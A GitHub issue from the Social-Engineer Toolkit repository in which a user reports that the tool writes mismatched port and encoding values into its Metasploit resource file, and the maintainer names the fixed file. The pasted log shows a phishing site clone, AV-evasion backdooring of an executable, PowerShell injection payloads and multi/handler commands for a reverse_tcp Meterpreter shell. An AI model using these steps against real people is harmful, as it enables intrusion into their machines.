trustedsec / social-engineer-toolkit

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.
10.92k stars 2.77k forks source link

SET confuses lines #52

Closed jonahwest closed 10 years ago

jonahwest commented 10 years ago

First I thought I messed up the config file , but then I did 3 fresh installs and problem persists ; (v 5.4.7)

(2) Website Attack Vectors (1) Java Applet Attack Method (2) Site Cloner (2) Windows Reverse_TCP Meterpreter (4) Backdoored Executable

It seems that SET confuses the lines on .set/meta_config ; (Tried to disable EnableStageEncoding=OFF , but same results)

Only the last try handler gets the correct values to the correct topic.

et:payloads> PORT of the listener [443]: [] Generating x86-based powershell injection code for port: 22 [] Generating x86-based powershell injection code for port: 53 [] Generating x86-based powershell injection code for port: 443 [] Generating x86-based powershell injection code for port: 21 [] Generating x86-based powershell injection code for port: 25 [] Finished generating powershell injection bypass. [] Encoded to bypass execution restriction policy... [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... [] Backdoor completed successfully. Payload is now hidden within a legit executable.


Web Server Launched. Welcome to the SET Web Attack.


[--] Tested on Windows, Linux, and OSX [--]
[] Moving payload into cloned website. [] The site has been moved. SET Web Server is now listening.. [-] Launching MSF Listener... [-] This may take a few to load MSF...

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm ?MMM MMMM dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM http://metasploit.pro

   =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]

[_] Processing /root/.set/meta_config for ERB directives. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 192.168.2.2 LHOST => 192.168.2.2 resource (/root/.set/meta_config)> set EnableStageEncoding 22 EnableStageEncoding => 22 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 192.168.2.2 LHOST => 192.168.2.2 resource (/root/.set/meta_config)> set EnableStageEncoding 53 EnableStageEncoding => 53 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 192.168.2.2 LHOST => 192.168.2.2 resource (/root/.set/meta_config)> set EnableStageEncoding 443 EnableStageEncoding => 443 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 192.168.2.2 LHOST => 192.168.2.2 resource (/root/.set/meta_config)> set EnableStageEncoding 21 EnableStageEncoding => 21 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 192.168.2.2 LHOST => 192.168.2.2 resource (/root/.set/meta_config)> set EnableStageEncoding 25 EnableStageEncoding => 25 resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/meta_config)> set LPORT false LPORT => false resource (/root/.set/meta_config)> exploit -j [-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding. resource (/root/.set/meta_config)> use exploit/multi/handler resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (/root/.set/meta_config)> set LHOST 192.168.2.2 LHOST => 192.168.2.2 resource (/root/.set/meta_config)> set LPORT 443 LPORT => 443 resource (/root/.set/meta_config)> set EnableStageEncoding false EnableStageEncoding => false resource (/root/.set/meta_config)> set ExitOnSession false ExitOnSession => false resource (/root/.set/metaconfig)> exploit -j [] Exploit running as background job. msf exploit(handler) >

trustedsec commented 10 years ago

Thanks for the report, in src/payloads/powershell/prep.py there was two instances where I placed the wrong variable in there. All set and pushed in version 5.4.8. Thanks for the bug report.